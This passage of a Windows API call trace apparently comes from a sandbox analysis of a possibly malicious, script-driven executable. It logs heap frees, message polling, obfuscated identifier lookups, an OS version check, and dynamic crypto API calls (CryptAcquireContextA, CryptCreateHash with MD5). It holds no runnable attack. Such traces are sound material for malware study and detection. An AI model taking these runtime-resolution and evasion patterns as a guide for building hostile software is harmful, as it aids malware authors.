lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.808] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.809] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.809] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.809] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.809] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.809] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.809] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.810] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.811] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.811] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.812] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.812] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.812] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.812] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.812] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.812] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.812] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.812] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.812] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.812] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.812] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.813] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c110) returned 1 [0208.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.813] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.814] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.814] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.814] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.815] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.815] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.815] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.815] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.815] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.815] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.815] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.815] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.815] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.815] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.815] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.815] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.815] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.816] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.816] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.816] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.816] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.816] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.816] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab260, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.816] CryptCreateHash (in: hProv=0xa7c110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.817] 